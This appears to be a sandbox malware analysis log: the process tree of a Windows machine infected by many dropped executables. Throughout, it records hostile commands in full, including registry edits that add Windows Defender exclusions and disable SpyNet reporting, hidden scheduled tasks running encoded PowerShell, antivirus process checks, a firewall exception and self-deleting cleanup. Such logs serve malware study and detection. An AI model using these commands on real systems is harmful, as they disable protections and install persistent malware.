C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\3efe7bdd-1728-416d-b1ee-1d25945f9f58.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\3efe7bdd-1728-416d-b1ee-1d25945f9f58.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\3efe7bdd-1728-416d-b1ee-1d25945f9f58.run\__sentry-breadcrumb2" --initial-client-data=0x490,0x494,0x498,0x468,0x49c,0x7ff61d75bc80,0x7ff61d75bca0,0x7ff61d75bcb8
7⤵
PID:49692

C:\Users\Admin\AppData\Local\Temp\Update-3dad049a-eecb-4b7e-8e93-de3183ba8f33\AdblockInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\Update-3dad049a-eecb-4b7e-8e93-de3183ba8f33\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
7⤵
PID:50828

C:\Users\Admin\AppData\Local\Temp\is-MN447.tmp\AdblockInstaller.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MN447.tmp\AdblockInstaller.tmp" /SL5="$E004E,15557677,792064,C:\Users\Admin\AppData\Local\Temp\Update-3dad049a-eecb-4b7e-8e93-de3183ba8f33\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
8⤵
PID:51044

C:\Windows\system32\netsh.exe
C:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE
7⤵
- Modifies Windows Firewall
PID:2348

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -install
7⤵
PID:48920

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -start
7⤵
PID:51116

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"
6⤵
PID:50796

C:\Windows\system32\reg.exe
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f
7⤵
- Modifies registry key
PID:50728

C:\Users\Admin\Pictures\Adobe Films\raMWZlmzPzIWdy_mnHCloZxp.exe
"C:\Users\Admin\Pictures\Adobe Films\raMWZlmzPzIWdy_mnHCloZxp.exe"
4⤵
- Executes dropped EXE
PID:48480

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" -y .\QXEL.eg
5⤵
PID:660

C:\Users\Admin\Pictures\Adobe Films\XGnhX4XLQ5xsCqwCSSpM2ZQp.exe
"C:\Users\Admin\Pictures\Adobe Films\XGnhX4XLQ5xsCqwCSSpM2ZQp.exe"
4⤵
PID:48468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
PID:50372

C:\Users\Admin\Pictures\Adobe Films\rWwyn2wp2r3f3edrLrpj0kDl.exe
"C:\Users\Admin\Pictures\Adobe Films\rWwyn2wp2r3f3edrLrpj0kDl.exe"
4⤵
- Executes dropped EXE
PID:48456

C:\Users\Admin\Pictures\Adobe Films\rWwyn2wp2r3f3edrLrpj0kDl.exe
"C:\Users\Admin\Pictures\Adobe Films\rWwyn2wp2r3f3edrLrpj0kDl.exe" -h
5⤵
PID:48436

C:\Users\Admin\Pictures\Adobe Films\2xV1QhA_FyWHbC_Ts_agbR1z.exe
"C:\Users\Admin\Pictures\Adobe Films\2xV1QhA_FyWHbC_Ts_agbR1z.exe"
4⤵
- Executes dropped EXE
PID:48444

C:\Users\Admin\Pictures\Adobe Films\2xV1QhA_FyWHbC_Ts_agbR1z.exe
"C:\Users\Admin\Pictures\Adobe Films\2xV1QhA_FyWHbC_Ts_agbR1z.exe"
5⤵
PID:2196

C:\Users\Admin\Pictures\Adobe Films\I208dVzUSqOgVhrIH_fKKOx5.exe
"C:\Users\Admin\Pictures\Adobe Films\I208dVzUSqOgVhrIH_fKKOx5.exe"
4⤵
PID:48424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
PID:48992

C:\Users\Admin\Pictures\Adobe Films\JXbJr960t8tSnYPT5IhyFDef.exe
"C:\Users\Admin\Pictures\Adobe Films\JXbJr960t8tSnYPT5IhyFDef.exe"
4⤵
- Executes dropped EXE
PID:48412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
PID:50500

C:\Users\Admin\Pictures\Adobe Films\E2wjsC5vzAhP_HKqoOZze8Cw.exe
"C:\Users\Admin\Pictures\Adobe Films\E2wjsC5vzAhP_HKqoOZze8Cw.exe"
4⤵
PID:48628

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 48628 -s 476
5⤵
- Program crash
PID:1088

C:\Users\Admin\Pictures\Adobe Films\TMmcmtewDYqI46FoXf7L6Fil.exe
"C:\Users\Admin\Pictures\Adobe Films\TMmcmtewDYqI46FoXf7L6Fil.exe"
4⤵
PID:48600

C:\Users\Admin\Pictures\Adobe Films\LAV7x5ewRB4RkcWaAL7LsvZg.exe
"C:\Users\Admin\Pictures\Adobe Films\LAV7x5ewRB4RkcWaAL7LsvZg.exe"
4⤵
PID:48592

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
5⤵
PID:50888

C:\Users\Admin\Pictures\Adobe Films\WnOCHbfMBNLXE8MdYNpZEpQB.exe
"C:\Users\Admin\Pictures\Adobe Films\WnOCHbfMBNLXE8MdYNpZEpQB.exe"
4⤵
PID:48572

C:\Windows\SysWOW64\robocopy.exe
robocopy 8927387376487263745672673846276374982938486273568279384982384972834
5⤵
PID:49028

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Provide.accdt & ping -n 5 localhost
5⤵
PID:52004

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:33596

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
7⤵
- Enumerates processes with tasklist
PID:55964

C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
7⤵
PID:55992

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
7⤵
- Enumerates processes with tasklist
PID:72492

C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
7⤵
PID:72616

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^NpDypcc$" Corner.accdt
7⤵
PID:72840

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Quite.exe.pif
Quite.exe.pif r
7⤵
PID:75092

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
6⤵
- Runs ping.exe
PID:75212

C:\Users\Admin\Pictures\Adobe Films\xhaTsPmO1_kZF84Iolej6VNT.exe
"C:\Users\Admin\Pictures\Adobe Films\xhaTsPmO1_kZF84Iolej6VNT.exe"
4⤵
PID:48564

C:\Windows\system32\cmd.exe
cmd.exe /c "del C:\Users\Admin\Pictures\Adobe Films\xhaTsPmO1_kZF84Iolej6VNT.exe"
5⤵
PID:48672

C:\Users\Admin\Pictures\Adobe Films\6zvu9b8VWCUKOyr9XoVvRvbj.exe
"C:\Users\Admin\Pictures\Adobe Films\6zvu9b8VWCUKOyr9XoVvRvbj.exe"
4⤵
PID:48536

C:\Users\Admin\AppData\Local\Temp\7zSE465.tmp\Install.exe
.\Install.exe
5⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\7zS2611.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
PID:48948

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:49624

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:49920

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:49632

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:4816

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:49808

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:50088

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:49336

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:48388

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "graDFOzvM" /SC once /ST 20:43:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:48300

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "graDFOzvM"
7⤵
PID:50136

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "graDFOzvM"
7⤵
PID:50376

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 22:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\PgPWXYK.exe\" d8 /site_id 525403 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:50556

C:\Users\Admin\Pictures\Adobe Films\E2wmNUePF6O32h75mC_Ck9Zw.exe
"C:\Users\Admin\Pictures\Adobe Films\E2wmNUePF6O32h75mC_Ck9Zw.exe"
4⤵
PID:48524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 456
5⤵
- Program crash
PID:48364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 768
5⤵
- Program crash
PID:49680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 776
5⤵
- Program crash
PID:48804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 824
5⤵
- Program crash
PID:50156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 840
5⤵
- Program crash
PID:48684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 868
5⤵
- Program crash
PID:49752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 824
5⤵
- Program crash
PID:50576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 1356
5⤵
- Program crash
PID:48724

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\RuyFkzGW\Cleaner.exe"
5⤵
PID:50192

C:\Users\Admin\AppData\Local\Temp\RuyFkzGW\Cleaner.exe
"C:\Users\Admin\AppData\Local\Temp\RuyFkzGW\Cleaner.exe"
6⤵
PID:51116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 1380
5⤵
- Program crash
PID:103008

C:\Users\Admin\Pictures\Adobe Films\SPZ393HzxUB1bmQbFruskOBR.exe
"C:\Users\Admin\Pictures\Adobe Films\SPZ393HzxUB1bmQbFruskOBR.exe"
4⤵
PID:48516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Get-WmiObject Win32_PortConnector"
5⤵
PID:33396

C:\Users\Admin\Pictures\Adobe Films\bpkZIh67SfrjIoXdygIq2sUj.exe
"C:\Users\Admin\Pictures\Adobe Films\bpkZIh67SfrjIoXdygIq2sUj.exe"
4⤵
PID:48972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 48972 -s 344
5⤵
- Program crash
PID:49068

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:3476

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:30740

C:\Users\Admin\Pictures\Minor Policy\GkkW3wKWJfoKEXtbVraCoY_5.exe
"C:\Users\Admin\Pictures\Minor Policy\GkkW3wKWJfoKEXtbVraCoY_5.exe"
2⤵
- Executes dropped EXE
PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 456
3⤵
- Program crash
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 768
3⤵
- Program crash
PID:30780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 776
3⤵
- Program crash
PID:31184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 820
3⤵
- Program crash
PID:31424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 840
3⤵
- Program crash
PID:33348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 984
3⤵
- Program crash
PID:33596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1012
3⤵
- Program crash
PID:48004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1376
3⤵
- Program crash
PID:2872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0I37zX9TjWjwqWBUJqMxC\Cleaner.exe"
3⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\0I37zX9TjWjwqWBUJqMxC\Cleaner.exe
"C:\Users\Admin\AppData\Local\Temp\0I37zX9TjWjwqWBUJqMxC\Cleaner.exe"
4⤵
PID:49736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1240
3⤵
- Program crash
PID:50592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 1248
3⤵
- Program crash
PID:72364

C:\Users\Admin\Pictures\Minor Policy\p0AC6yBn3ASw6LWWgTDhKQqw.exe
"C:\Users\Admin\Pictures\Minor Policy\p0AC6yBn3ASw6LWWgTDhKQqw.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4304

C:\Users\Admin\AppData\Local\Temp\7zSE94B.tmp\Install.exe
.\Install.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1440

C:\Users\Admin\AppData\Local\Temp\7zS19D1.tmp\Install.exe
.\Install.exe /S /site_id "525403"
4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:4236

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:30764

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:31000

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:31308

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:31480

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:30940

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:31088

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:31244

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:31352

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gEcIRDfjP" /SC once /ST 19:16:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:33668

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gEcIRDfjP"
5⤵
PID:48088

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gEcIRDfjP"
5⤵
PID:48816

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 22:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\qSLPdIl.exe\" d8 /site_id 525403 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:4140

C:\Users\Admin\Pictures\Minor Policy\xLmGFtewVGx31R1dEvJapWTf.exe
"C:\Users\Admin\Pictures\Minor Policy\xLmGFtewVGx31R1dEvJapWTf.exe"
2⤵
- Executes dropped EXE
PID:2928

C:\Users\Admin\Pictures\Minor Policy\89H2U6T799E_xQqJCTJUsYKn.exe
"C:\Users\Admin\Pictures\Minor Policy\89H2U6T799E_xQqJCTJUsYKn.exe"
2⤵
- Executes dropped EXE
PID:4988

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:102704

C:\Users\Admin\Pictures\Minor Policy\lFyZ92vXmfbnHdGnC1PY_RhC.exe
"C:\Users\Admin\Pictures\Minor Policy\lFyZ92vXmfbnHdGnC1PY_RhC.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2436

C:\Users\Admin\Pictures\Minor Policy\lFyZ92vXmfbnHdGnC1PY_RhC.exe
"C:\Users\Admin\Pictures\Minor Policy\lFyZ92vXmfbnHdGnC1PY_RhC.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:504

C:\Users\Admin\Pictures\Minor Policy\xqKmRxyI9yMan9smqcBne3I2.exe
"C:\Users\Admin\Pictures\Minor Policy\xqKmRxyI9yMan9smqcBne3I2.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1984

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:31652

C:\Users\Admin\AppData\Local\Temp\Qabnnvplfigzehwmiavailablenature_s.exe
"C:\Users\Admin\AppData\Local\Temp\Qabnnvplfigzehwmiavailablenature_s.exe"
4⤵
PID:50644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
5⤵
PID:50352

C:\Users\Admin\AppData\Local\Temp\Qabnnvplfigzehwmiavailablenature_s.exe
C:\Users\Admin\AppData\Local\Temp\Qabnnvplfigzehwmiavailablenature_s.exe
5⤵
PID:5244

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
4⤵
PID:50956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1624

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 480 -p 2832 -ip 2832
1⤵
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4472 -ip 4472
1⤵
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4472 -ip 4472
1⤵
PID:30372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4472 -ip 4472
1⤵
PID:31120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4472 -ip 4472
1⤵
PID:31392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4472 -ip 4472
1⤵
PID:33300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4472 -ip 4472
1⤵
PID:33552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4472 -ip 4472
1⤵
PID:47972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:48060

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:103328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4472 -ip 4472
1⤵
PID:48944

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 48628 -ip 48628
1⤵
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 48972 -ip 48972
1⤵
PID:48268

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\392C.dll
1⤵
PID:31216

C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\392C.dll
2⤵
PID:49100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 48524 -ip 48524
1⤵
PID:49048

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
2⤵
- Creates scheduled task(s)
PID:48600

C:\Users\Admin\AppData\Local\Temp\410C.exe
C:\Users\Admin\AppData\Local\Temp\410C.exe
1⤵
PID:48840

C:\Users\Admin\AppData\Local\Temp\4766.exe
C:\Users\Admin\AppData\Local\Temp\4766.exe
1⤵
PID:48984

C:\Users\Admin\AppData\Local\Temp\4766.exe
C:\Users\Admin\AppData\Local\Temp\4766.exe
2⤵
PID:50856

C:\Users\Admin\AppData\Local\Temp\4766.exe
"C:\Users\Admin\AppData\Local\Temp\4766.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:50336

C:\Users\Admin\AppData\Local\Temp\4766.exe
"C:\Users\Admin\AppData\Local\Temp\4766.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:52468

C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build2.exe
"C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build2.exe"
5⤵
PID:56984

C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build2.exe
"C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build2.exe"
6⤵
PID:75284

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build2.exe" & del C:\PrograData\*.dll & exit
7⤵
PID:103220

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
8⤵
- Kills process with taskkill
PID:103272

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:3588

C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build3.exe
"C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build3.exe"
5⤵
PID:72532

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
6⤵
- Creates scheduled task(s)
PID:72548

